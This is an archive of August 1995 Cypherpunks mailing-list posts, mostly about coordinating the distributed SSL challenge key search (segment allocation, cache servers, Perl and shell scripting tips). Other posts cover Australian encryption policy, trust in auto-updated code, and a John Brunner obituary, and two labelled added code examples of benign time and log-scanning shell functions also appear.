> I would be extremely wary of this as accepting code written by someone else to
> automatically run on your machine is bad.
...

Why?

I wouldn't say "bad".

I'd say "you need to know what you are doing".

...
> If they do
> not have the expertise, they will hear of it soon enough when others scan the
> offered code.
...

Perhaps there should be a mechanism whereby code offered would be
signed by various parties. When sufficient signatures have collected,
auto-update can proceed.


Yes, no, maybe?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEFmuixV6mvvBgf5AQEkRwP/TUorbtcmElHjWVrxJ8KoTlM0D3/oK4xh
Jh4+QLGaH/aNvI5ehdhPjn+tFXwL/ONS+J/pzO0b2cP9GcM3D6PvtUWxmsTwwaMh
jXkctAPIuO24nb0cAXtcj7LlUe4s5DqIVvkCYi8UrdPXrYEV5DaKti4MYD7oShgC
XMkzzcv55bQ=
=wa8h
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 28 Aug 95 14:07:52 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: SSL trouble
In-Reply-To: <"swan.cl.cam.:216660:950828181616"@cl.cam.ac.uk>
Message-ID: <RAA13233.199508282105@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <"swan.cl.cam.:216660:950828181616"@cl.cam.ac.uk>, Piete Brooks writ
[...]
>PS1: PERL gurus: Anyone know how to test whether there is input waiting on a
>     file handle ? I know about seeing if there is data waiting for the next
>     sysread type read, but not on the next <SERVE> type read. Ideas ?

I don't think there is one.  I would just use select() on FD, and then
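a subroutine much like this:

sub syswrite {
    local($FH, $buf) = @_;

    local($len, $offset, $wlen) = (length($buf), 0, 0);

    # The builtin syswrite may write less than asked, so loop until done.
    while($len) {
        $wlen = syswrite($FH, $buf, $len, $offset);
        # Check the return value of the write, not the file handle.
        die "Bad write $FH: $!" if (!defined($wlen));

        # Advance by the number of bytes actually written.
        $offset += $wlen;
        $len -= $wlen;
    }
}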


Actually if you can use perl5 for the server (I assume this is the
server code you are worrying about) I have code that deals with
I/O from multiple sockets at once and drives an independent state
machine for each socket.

>PS2: PERL gurus: I fixed the SGI Challenge problem by HACKing it -- as I
>     thought it was a problem with stdio in and out on the same socket.
>     The perl man page warns:
>	If  your  stdio  requires an seek or eof between reads and
>	writes on  a  particular  stream,  so  does  perl.   (This
>	doesn't apply to sysread() and syswrite().)
>     so I change the one "print SERVE" line to a "syswrite(SERVE" and that
>     fixed it. However, does anyone know the "correct" way to use stdio for
>     I/O?

For bi-directional pipes I tend to use sysread/syswrite anyway, but
you could just sprinkle "seek(SERVE, 0, 1)" liberally through the
code.

>PS3: I'd like to get the raw date in brloop (a sh script). In perl I'd just
>     use "time", and I can't see a way to get "date +" to yield the raw time.
>     I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
>     may not be on the users PATH. Any suggestions ?

"date '+%s'" does it under BSDI, but I'm not sure how portable it is.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 28 Aug 95 14:29:36 PDT
Subject: Re: SSL trouble
In-Reply-To: <RAA13233.199508282105@garotte.va.pubnix.com>
Message-ID: <RAA13413.199508282126@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <RAA13233.199508282105@garotte.va.pubnix.com>, "Josh M. Osborne" writes:
[...]
>sub syswrite {
[...]

So sorry.  I gave out the wrong code.  Let me try again:

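sub sysreadln {
    local($FH) = @_;

    local($len, $line, $offset) = (0, "", 0);
    
    # Read one byte at a time until the last byte read is a newline.
    while("\n" ne substr($line, $offset-1, 1)) {
        $len = sysread($FH, $line, 1, $offset);
        die "Bad read from $FH: $!" if (!defined($len));
        # sysread returns 0 at end of file; stop instead of looping forever.
        last if ($len == 0);
        $offset += $len;
    }

    return $line;
}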

There.  That should help.

(yes, this is slow since it asks the OS for a single byte at a time,
but in practice it isn't too bad - I use it for small tasks and my
multi-stream state-machine monster for the rest)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 28 Aug 95 17:38:36 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: Florida Drivers Permits
Message-ID: <199508290035.RAA08342@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:55 AM 8/29/95 +1000, you wrote:
>>>Better would be to figure out the encoding scheme and post it here.
>>I like this, myself.  It'd be nice to be able to have the picture of my
>>choosing instead of a digitized thumbprint...
>
>I think the officer arresting you would frown if your license dumped a nudie
>picture of Cindy Crawford instead of your identification details.

Yeah, but your basic thumb-shaped black smudge might look believable...
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 28 Aug 95 14:50:24 PDT
To: Cypherpunks List <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <Pine.SUN.3.91.950828174849.14722A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain





It's been far too long since I cleaned up the namespace clutter on
alpha.c2.org.  So I have deleted all reply blocks which point to
remailer@jpunix.com, remailer@tower.techwood.org, usura@replay.com,
myriad, wmono, desert, nately, and all the other dead remailers I could
think of.  I did this with a grep/awk script, so I hope it didn't maul
any valid addresses.  There are probably still a lot more dead addresses,
but hopefully this cleans up the namespace somewhat.


[...]


THE FOLLOWING HAVE BEEN DELETED:

abdul
alexr
alice
an34267
anna
avatar
beaver
blacknet
^^^^^^^^
bolt_thrower


Uh oh!  :)



---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Mon, 28 Aug 95 17:48:03 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <v0213050bac681eb58454@[157.22.240.11]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:55 PM 8/28/95, Mark wrote:
>>>Better would be to figure out the encoding scheme and post it here.
>>
>>I like this, myself.  It'd be nice to be able to have the picture of my
>>choosing instead of a digitized thumbprint...
>
>I think the officer arresting you would frown if your license dumped a nudie
>picture of Cindy Crawford instead of your identification details.
>
>Sounds like a great way to smuggle nuclear secrets out of a country tho :)

What is the capacity of the mag strips? Do they carry much more than some
ID code for computer reference? It seems unlikely that there is enough
storage for a thumbprint. Some vitals perhaps, but again it would most likely
simply be a speedier way of referencing the card holder's supposed True Name.
(After all they'd have to be checking driving record information as well.)
Still, decrypting the cards would be amusing, just to aggravate those who
become too used to the convenience. 'Oh.. sorry Governor Wilson... my but you
look different up close'.


Being in California, I've avoided getting a Cali license due in large part
to the use of thumbprints. Perhaps I'm being silly, but I find it difficult
to give up such vitals. It's the sheeplike way the majority of the
population happily gives up its remnants and shreds of privacy which makes
this such an important area.

As for the Hello mentioned in the subject line... A few of you may know me
already. I work for Consensus Development. We're going to be able to
license out RSARef commercial use quite soon. Some of the people I've
talked to have asked me to jump on Cypherpunks, so I've been going over the
archives on the Cypherpunk list, and while rather large, I'm quite pleased
to see the high content/noise ratio here. Anyway, my task is to get in gear
as the Knowledge Officer for RSARef, and I am currently putting together
the new RSARef discussion lists. Since I don't have the constitution (or
obligation) to be a salesperson I'll leave the RSARef stuff at that. If you
do have questions, or want to be put on the RSARef announcement list, drop
me an email.

Jonathan Zamick
(Off to play with PGPFone.... how happy am I? :)

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 09:55:44 PDT
To: ab411@detroit.freenet.org
Subject: Re: Pre-allocating key segments
In-Reply-To: <199508281410.KAA16345@detroit.freenet.org>
Message-ID: <"swan.cl.cam.:184040:950828165514"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> If the client is unable to retrieve a block from the server, I suggest
>> it just picks a random block and starts working on it. I may very
>> well not be allocated to someone else, and then the client was able
>> to do something good in the meantime even though it didn't get a
>> proper key alloc. 
> Not only that, but the client ought to allocate some keyspace before it
> needs it, as I think one other cpunk suggested.

I'd prefer to keep the number of segments "lost" if a brloop ceases.

I have written a "local CPU farm" caching server which runs on a robust
machine and grabs chunks from the root server and farms them out to local
machines (running as the same "ID").
This logs all the client transactions so that you can work out if any keys were
allocated to machines which failed to ask for another segment -- you should
assume that that segment was not searched.

With the Big Boys using that, and better code, I hope that server congestion
will not be a problem.

> For instance, if it has
> four segments allocated and it's done three of them, it should fork a
> process to begin requesting four more segments *while* it is scanning
> the last segment, rather than waiting until after it is done and leaving
> the machine idle until it can alloc more keys.

That means that if it crashes, 8 segments are left unACKed :-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Mon, 28 Aug 95 16:04:04 PDT
To: stripes@va.pubnix.com
Subject: Re: SSL trouble
Message-ID: <9508282302.AA12759@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



>
> >PS3: I'd like to get the raw date in brloop (a sh script). In perl I'd just
> >     use "time", and I can't see a way to get "date +" to yield the raw time.
> >     I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
> >     may not be on the user's PATH. Any suggestions ?
>
> "date '+%s'" does it under BSDI, but I'm not sure how portable it is.
>
 
This is what I got from SunOS 4.1.x
 
        $ date +%s
        date: bad format character - s
 
Sounds like something my parents might have said ;-)
 
Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Mon, 28 Aug 95 16:23:45 PDT
To: stripes@va.pubnix.com
Subject: Re: SSL trouble
Message-ID: <9508282322.AA12838@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> >PS3: I'd like to get the raw date in brloop (a sh script). In perl I'd just
> >     use "time", and I can't see a way to get "date +" to yield the raw time.
> >     I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
> >     may not be on the user's PATH. Any suggestions ?
> 
> "date '+%s'" does it under BSDI, but I'm not sure how portable it is.
> 

That doesn't work under SunOS 4.1.x, but this does:

   date "+%S %M 60 * + %H 3600 * + %j 86400 * + %y 31536000 * + p" | dc

This assumes 365 days/year, so if you jump from a leap year to a non-leap
year it won't work right.  Hey - a 1/1460 failure rate is better
than most Windoze programs I've used ;-)

It also isn't the "absolute" time, (as given by time()), but
gives a number of seconds that constantly increases.
 
With a little more work you should be able to adjust this to be close
to time() functionality.


Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
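
Added example (not part of the message above, and not brloop code): the dc one-liner's arithmetic next to a leap-year-aware version that yields true seconds since the epoch in plain sh. The function names are hypothetical, and it assumes a date(1) that accepts -u and the %Y %j %H %M %S conversions.

```shell
#!/bin/sh
# Added example, not from the thread: seconds since 1970-01-01 00:00:00 UTC
# computed from date(1) fields, for systems whose date lacks "+%s".
# Assumption: date accepts -u and the %Y %j %H %M %S conversions.

# Strip leading zeros so "08" or "009" is not rejected as bad octal.
dec() {
    n=$1
    while [ "${#n}" -gt 1 ] && [ "${n#0}" != "$n" ]; do
        n=${n#0}
    done
    printf '%s\n' "$n"
}

# counter_365 YY DDD HH MM SS
# Same arithmetic as the dc one-liner: two-digit year, 365-day years.
counter_365() {
    y=$(dec "$1"); j=$(dec "$2"); h=$(dec "$3"); m=$(dec "$4"); s=$(dec "$5")
    echo $(( s + m * 60 + h * 3600 + j * 86400 + y * 31536000 ))
}

# epoch_from_fields YYYY DDD HH MM SS   (fields in UTC, year 1970 or later)
# POSIX "seconds since the Epoch" formula; the three division terms count
# the leap days between 1970 and the start of the given year.
epoch_from_fields() {
    y=$(dec "$1"); j=$(dec "$2"); h=$(dec "$3"); m=$(dec "$4"); s=$(dec "$5")
    ty=$(( y - 1900 ))
    leap=$(( (ty - 69) / 4 - (ty - 1) / 100 + (ty + 299) / 400 ))
    days=$(( (ty - 70) * 365 + leap + j - 1 ))
    echo $(( days * 86400 + h * 3600 + m * 60 + s ))
}

# Current time, usable where a script would have written `date +%s`.
epoch_now() {
    set -- $(date -u '+%Y %j %H %M %S')
    epoch_from_fields "$@"
}
```

Across the 1996/1997 year boundary the 365-day counter steps backwards by 86399 seconds, while epoch_from_fields advances by one.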





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 11:51:28 PDT
To: cypherpunks@toad.com
Subject: Re: R.I.P. John Brunner
Message-ID: <ac67bd0f07021004b3b3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:03 PM 8/28/95, Alan Bostick wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Science fiction writer John Brunner died last Friday, August 25, from
>a massive stroke, while attending the World Science Fiction Convention
>in Glasgow, Scotland.
>
>Among several other notable works, Brunner was the author of THE SHOCKWAVE
>RIDER, a groundbreaking vision of the information age that inspired and
>foresaw much that was pertinent to the Internet in general and the
>Cypherpunks in particular.
>
>Let us pause a moment to note his passing and honor his life and
>contributions.

I am saddened to learn this.

And, yes, this has a lot to do with Cypherpunks. I read "Stand on Zanzibar"
with rapt attention in 1969 or so, and it had a big influence on me.

Ditto for "The Shockwave Rider," one of the very first explications of how
identities would be changed, how the State would insist on computerized
identities. (Indeed, "1984" came first, and is an even more important work,
by any standards, but Brunner still nailed the effects of computers in a
way that Orwell could not possibly have.)

Christ, what an imagination he had!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@c2.org (Matthew Ghio)
Date: Mon, 28 Aug 95 16:06:31 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypted TCP, telnet, etc
In-Reply-To: <199508280514.XAA00277@wero>
Message-ID: <m0snD2H-000wcWC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


root <root@wero.toad.com> wrote:
>But I missed where this comes from, and I doubt I'd be able to
>drop it into my Linux in anything resembling a plug-and-play
>style. Anybody tried this?

I am using it.  It works fine on Linux and was very easy to set up.
Just -DLINUX in the makefile and build it.  Then put it in your inetd
or start the server standalone.  I use
% cryptod 49374 &
to put it on port 49374 (Look at it in hex ;-)

My biggest gripe with it is that it doesn't like Sparcs too much.
I finally did get it to compile but it still seems to occasionally
crash during key-exchange for no apparent reason. :(
Which is weird because it never crashes under Linux.  oh well.

I'm using v0.9, which I got from utopia.  Is there a newer version?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 28 Aug 95 05:02:11 PDT
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: Law enforcement and PGP ban in Australia
Message-ID: <199508280756.AA24358@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>X-News: uqvax aus.net.policy:286
>From: Peter Merel <pete@extro.su.oz.au>
>Subject:Open Letter from Steve Orlowski
>Date: 18 Aug 95 06:52:32 GMT
>
>I've received something that purports to be an open letter from Steve
>Orlowski. Be warned that the letter has no digital authentication with it,
>so it may have been forged. However it reads like the real magilla, so I'll
>post it here in the hope that it might inform debate a little.
>
>
>--------------------- cut here ----------------------------
>
>
>Dear
>
>Thank you for your comments on the subject of the use of encryption by private
>individuals.
>
>Firstly I would like to make the point that the debate has arisen from one
>person's interpretation of a paper I gave at a conference on "Cryptography
>Policies and Algorithms".  The full text of that paper is now available on the
>net at
>
>	http://commerce.anu.edu.au/comm/staff/RogerC/RogersHome.html
>
>The paper carries a disclaimer at the top that the views are mine and do not
>necessarily represent the views of the Australian Government.  The paper sets
>out the Government's policy on telecommunications interception, which includes
>the issue of the use of cryptography as:
>
>"As a result of the Report, Australia is, among other TI issues, monitoring the
>impact of encryption in the telecommunications interception area and will
>re-examine matters in 1997 following the opening of the telecommunications area
>to full competition."
>
>Telecommunications covers both voice and data communications.
>
>The last paragraph of the paper says that there is a need to expand the
>cryptography debate to cover the needs of individual users in the context of
>the information superhighway rather than current Internet users.  The paper
>also points out that issues such as cost, convenience and public confidence in
>cryptography systems will be the main issues.  Public confidence is explained
>in terms that as long as it meets the general requirement for privacy it will
>be acceptable.  I still maintain that the general user of the superhighway  in
>the next century will be satisfied with a lower level of encryption which will
>meet that and cost and user friendliness requirements.
>
>On specific point made in the Internet message, the paper does not suggest,
>either directly or by implication, that individuals should be banned from using
>encryption.
>
>Regarding the use of higher level encryption, the paper supports the concept of
>commercial key escrow where organisations hold their own keys but may be
>required to provide them in response to a court order.  The same would apply to
>individuals who could either hold their own keys or store them with a
>commercial body.  Access to those keys would be by court order and in that
>respect is no different to existing procedures for the interception or seizure
>of telephone conversations or paper records.  There is no suggestion that these
>basic principles, and protection of individual's rights in general, should be
>changed.
>
>If individuals were to use lower level encryption there would be no need for
>them to maintain copies of any keys for such systems.  To my mind this is
>preferable to a requirement for keys to be maintained for all encryption
>systems, which could be the result if universal key escrow were introduced.
>
>Finally on the question of interception, the general public expects a
>reasonable level of law enforcement to ensure the protection of their person
>and property.  Governments are required to find a balance between this and the
>rights of individuals to privacy.  Part of this balance is to ensure that law
>enforcement authorities convince a court that there is a need to carry out an
>interception.  There is no suggestion that this fundamental approach should be
>changed.  The paper certainly does not suggest that the Attorney-General's
>Department should become a centralised interception authority.  In fact such a
>role would not be consistent with its role as a source of advice to Government.
>
>I hope the above clarifies both the Government's policy and my personal views
>on these matters.
>
>I consider this to be an open letter and have no objection to it being used as
>such.
>
>Yours sincerely
>Steve Orlowski



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 11:16:33 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: SSL trouble
In-Reply-To: <9508281635.AA19987@cantina.verity.com>
Message-ID: <"swan.cl.cam.:216660:950828181616"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I did a distributed scheme for something else that had two levels, a master
> and a group of slaves.  Only the slaves talked to the master.  For this 
> effort I think a variation of the idea would be better.  Have all of the
> brutes contact the master, who will, in the first transaction assign them
> to the next slave in a round-robin fashion.

Well, imagine my surprise  ....  [[ reference to ISIRTA ]]

One of the things that the latest brloop does is make a call to the master
server asking for a list of servers to contact :-))

Note that it is a list, and it tries them in order (all A RRs).

> Then all of the transactions from that point would take place between the
> brute and the slave:)

Currently just all the "allocate" transactions -- I haven't written my
ACK reflector yet, so all ACKs go direct to the ACK master.

> The slaves would each be delegated large chunks of the keyspace,

No -- the slaves will not "be delegated" (as in pre-assigned address space),
they will just ask the master for it as they need it.
Sure, they'll do it in reasonable sized chunks, but not (2**16)/16 ....

> but not keyspace/numslaves.  Maybe 1/16th or something like that, and could
> ask for more when their space was depleted.  Periodically, perhaps when
> requesting more key space, and/or when a timer pops, the slaves could report
> results.

Nah - results still go direct pro tem.

> What I mean is that every so often they'd report even if they didn't need
> more keyspace yet, iff they had any new stats to report.

Sure.

> The nice thing here is that the work of the master and of the slaves is
> almost the same.

You got it !

> The slaves don't have to do the initial assignment of slave,
(slave -> slaves I assume)

> and the master doesn't have to report results, but everything else
> is the same.

Yup -- code sharing !

> With careful design you could use the same daemon for both
> with a command line argument to tell it if it was the master (-m) or the
> slave (-s).

Well, not even that !

The slaves don't have the config file with the key info in it ...

> Of course I'm sure you see that this allows you to add as
> many levels as you want to the hierarchy.

Indeed.

BUT ....

These cache servers are asking for non trivial amounts of keyspace.
As such there should not be *too* many, and then need to be "managed" ...
If one crashes, the logs need to be scanned to see how to restart it (so that
it starts by doling out the segments that it had not sub-doled to its clients).

> A slave doesn't care whether a slave or a brute talks to it.

Indeed -- that's how it was designed ...

However, note that with big cache servers (as opposed to Local CPU Farm servers
where all clients are the same "ID") reports of sub-allocation have to be
passed back to the root :-(

> You could make the slave software available as well, and a site with many
> machines could have only the slave contact the master to get assigned a
> slave to talk to, and could configure all of their brutes to talk to
> their own slave.

Indeed -- the Local CPU Farm cache server is just about ready for ALPHA testers

> Software like this is easy to write, (and fun), and we should go for it:)

Done ...

> Of course I do everything like this in C++, but I suppose perl would be the
> most portable.  It's a shame it's so aesthetically displeasing to the eye.

Yeah -- but being based on C, C++ didn't stand much chance ...

> perl's never a pleasant read.

... but better than C++ -- sure.


PS1: PERL gurus: Anyone know how to test whether there is input waiting on a
     file handle ? I know about seeing if there is data waiting for the next
     sysread type read, but not on the next <SERVE> type read. Ideas ?

PS2: PERL gurus: I fixed the SGI Challenge problem by HACKing it -- as I
     thought it was a problem with stdio in and out on the same socket.
     The perl man page warns:
	If  your  stdio  requires an seek or eof between reads and
	writes on  a  particular  stream,  so  does  perl.   (This
	doesn't apply to sysread() and syswrite().)
     so I changed the one "print SERVE" line to a "syswrite(SERVE" and that
     fixed it. However, does anyone know the "correct" way to use stdio for I/O?

PS3: I'd like to get the raw date in brloop (a sh script). In perl I'd just
     use "time", and I can't see a way to get "date +" to yield the raw time.
     I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
     may not be on the user's PATH. Any suggestions ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 28 Aug 95 05:02:35 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Auto-update (was: Re: SSl challenge - it was fun!)
In-Reply-To: <199508280649.QAA12896@sweeney.cs.monash.edu.au>
Message-ID: <199508280818.AA67660@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>...[asking for an auto-update]...
>> I would be extremely wary of this as accepting code written by someone else
>>to automatically run on your machine is bad.
>...
>
>Why?
>
>I wouldn't say "bad".
>
>I'd say "you need to know what you are doing".
>
>...
>> If they do
>> not have the expertise, they will hear of it soon enough when others scan the
>> offered code.
>...
>
>Perhaps there should be a mechanism whereby code offered would be
>signed by various parties. When sufficient signatures have collected,
>auto-update can proceed.
>
>
>Yes, no, maybe?

No. Bypassing anecdotes about personal experiences with some .au cpunks, why
should I trust *anyone* to certify that code is auto runnable on my machine?
In secure or commercial networks, the onus is on making sure holes are not
opened up in the defences.

To me, having all these crypto links, digital envelopes, crypto filesystems,
etc all mean zero if you start offering to run code blindly from anyone.

Next.

Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 11:49:45 PDT
To: cypherpunks@toad.com
Subject: "Virtuosity" -- A New Movie
Message-ID: <ac67c3a90a0210044096@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I make no apologies for this not being "on topic," where "on topic" is
defined as "coding in C." If you don't like my comments to our community,
you know how to filter out my messages.

I saw "Virtuosity" today, not expecting much. It's been called "a stinker"
by at least one reviewer. But I enjoyed it.

It had fairly impressive effects and fairly accurate treatments of:

-- "microlocators" (implantable localizers)

(The technology of which, in the real world, Bob Fleming and Cherie Kushner
described at the "Cypherpunks Santa Cruz" meeting/party at my place on
Saturday. By the way, the meeting was well-attended, with 22 attendees,
including Greg Broiles from Eugene, Oregon, Jeff Simmons from San Luis
Obispo, and a bunch of folks from the Santa Cruz area and Bay Area.)

-- nanotechnology...well done

-- genetic algorithms and evolving programs...very, very well done!

-- virtual reality...less well done, especially as it's been done before

There were a few disconnects, such as that the time for the movie seemed
only a few years in the future, and yet certain technologies were very far
advanced.

I was impressed, much more so than with "The Net" or other recent high-tech
movies. (I can't wait for "Pulp Science Fiction"!)

For those who think this off-topic, "Man does not live by coding alone."

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Mon, 28 Aug 95 11:45:07 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <9508281844.AA22408@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: Christian Wettergren <cwe@Csli.Stanford.EDU>

>What I wonder is whether the server congestion really showed that
>the protocol is flawed.

I never meant to say that the protocol was flawed in any way.
I'm sorry if I gave this impression. (I used pretty much the same
protocol on Hal1)

Since I'm not the one who's writing the code, I will not try to tell
you how it should be written, of course.

My point was only that the central server approach does not scale.
When we reach its limit (and it seems we have not reached it yet), we
can use a hierarchical approach, and it is faster than the random one.
But the random algorithm does have its strong points and we should not
dismiss it out of hand.  Maybe I got a little carried away in my
advocating of the random algorithm.

(another topic:)
As for the updates to the client software, let me point out that I did
10 different versions of my own client when working on Hal1.  Some
machines worked for one week with version 1, while others needed many
updates, due to different network and OS conditions.  This is the main
advantage of a well-defined (and stateless) protocol: it allows the
server and clients to be all updated independently while the
computation is running.

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 12:51:56 PDT
To: ab411@detroit.freenet.org
Subject: Re: Pre-allocating key segments
In-Reply-To: <199508281854.OAA23029@detroit.freenet.org>
Message-ID: <"swan.cl.cam.:251330:950828195006"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> I'd prefer to keep the number of segments "lost" if a brloop ceases.
> Keep down, I guess you meant.

Indeed -- Ta.

>> ... if any keys were allocated to machines which failed to ask for another
>> segment -- you should assume that that segment was not searched.
> I agree that is the best policy -- it fails safe -- but I still think the
> prefetching of some more segments would be useful.

I'm seeing calls from calpoly.edu and albany.net taking less than a second.
Are you **REALLY** worried about wasting that sort of time, when even a single
segment usually takes a quarter of an hour even on the faster machines ?

> The goal is to suck up as many idle cycles as is practical.

I don't think a second's overhead (practical with local cache) is significant.

>> That means that if it crashes, 8 segments are left unACKed :-(
> And if it had grabbed 8 segments to begin with and crashed, it still
> would have been 8 segments left unACKed.

Sure, but I'd prefer you allocate single segments .....

> Plus, it's only 8 segments unACKed if it crashes before it finished that
> last segment, since it will start trying to ACK the first four segments
> when it finishes the fourth -- at the same time starting on the next
> four segments.

Sure.

[ Getting down to the implementation details
  1) it would be hard for brloop to know that brutessl is 3/4s done.
  2) I can't think how to do prefetching in a safe way, and without disc use
]

> Would you see it any differently if I had said, "For instance, if it has
> two segments allocated and it is halfway through the second segment, it
> should request two more segments *while* it is scanning the last segment"?

No.

If you gave me code which would guess how long the request for the next
segment will take, and then know when brutessl is that many milliseconds from
completion, and can tell that brloop isn't going to die within that time,
sure :-))


If someone supplies info for my "PS3:", I can generate central stats on what
%age of Hal3 was wasted waiting on the server.
Otherwise, brloop users will have to scan their own logs (if enabled) and work
it out (latest brloop happens to log when brutessl starts and finishes).
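
Added example (not part of the message above, and not the cache server's own code): the log scan this thread describes, where a segment that was handed out but never ACKed is assumed unsearched and a restarted cache server first doles out what it had not yet sub-doled. The GOT/ALLOC/ACK log format, the segment ids and the host names are constructed, since the real log format does not appear in the thread.

```shell
#!/bin/sh
# Added example, not from the thread.  The log format is constructed:
#   GOT   <segment>            cache server fetched a segment from the root
#   ALLOC <client> <segment>   segment handed to a local client
#   ACK   <client> <segment>   that client reported the segment searched

# Reads a log on stdin; prints one line per segment that is not finished:
#   undoled <segment> -           fetched but never handed out
#   unacked <segment> <client>    handed out, no matching ACK: assume unsearched
#   stray-ack <segment> <client>  ACK that matches no outstanding allocation
segment_report() {
    awk '
        $1 == "GOT"   { state[$2] = "undoled"; who[$2] = "-"; next }
        $1 == "ALLOC" { state[$3] = "unacked"; who[$3] = $2;  next }
        $1 == "ACK"   {
            # Test membership first: a bare state[$3] would create the entry.
            if (($3 in state) && state[$3] == "unacked" && who[$3] == $2)
                state[$3] = "done"
            else
                stray[$3 " " $2] = 1
            next
        }
        END {
            for (s in state)
                if (state[s] != "done") print state[s], s, who[s]
            for (k in stray) print "stray-ack", k
        }
    ' | LC_ALL=C sort
}

# Segments to hand out after a restart: never-doled ones first, then the
# ones whose client went quiet (assumption: those are simply re-issued).
requeue_order() {
    segment_report | awk '
        $1 == "undoled" { first = first $2 "\n" }
        $1 == "unacked" { later = later $2 "\n" }
        END { printf "%s%s", first, later }
    '
}

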